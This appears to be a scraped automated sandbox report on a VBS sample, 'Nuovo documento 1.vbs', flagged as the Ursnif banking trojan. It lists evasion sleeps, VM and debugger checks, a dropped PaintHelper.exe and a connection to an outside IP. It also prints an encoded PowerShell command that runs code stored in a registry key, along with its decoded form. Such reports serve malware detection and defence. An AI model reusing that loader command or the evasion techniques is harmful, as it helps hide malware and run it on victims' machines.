Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1599

Found evasive API chain (date check)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_4-4625

Found evasive API chain checking for process token information

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-5304

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 4808	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3688	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788	Thread sleep count: 2891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788	Thread sleep count: 1599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWystem32\stdole2.tlbe
Source: wscript.exe, 00000000.00000003.713739652.000002A59CA05000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Program exit points

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

API call chain: ExitProcess graph end node

graph_4-5608

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,

4_2_00401A88

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_00401015 EntryPoint,GetModuleHandleA,GetProcessHeap,GetCurrentThread,WaitForSingleObject,ExitProcess,

4_2_00401015

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Memory protected: page execute read | page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: PaintHelper.exe.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe

Network Connect: 89.191.225.207 80

Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: =Program Managerb

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_0072857D cpuid

4_2_0072857D

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_00721308 GetSystemTimeAsFileTime,

4_2_00721308

Contains functionality to query the account / user name

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_00419AA0 IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,GetUserNameA,DeleteMetaFile,CreateMetaFileA,CharNextA,StrokePath,IsCharAlphaW,EndDoc,InSendMessage,GetMenuCheckMarkDimensions,GetParent,CreateMetaFileW,LoadCursorW,LoadLibraryA,GetProcAddress,

4_2_00419AA0

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Nuovo documento 1.vbs

Overview

General Information

Detection

Confidence

Classification Spiderchart

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Malware Configuration

Behavior Graph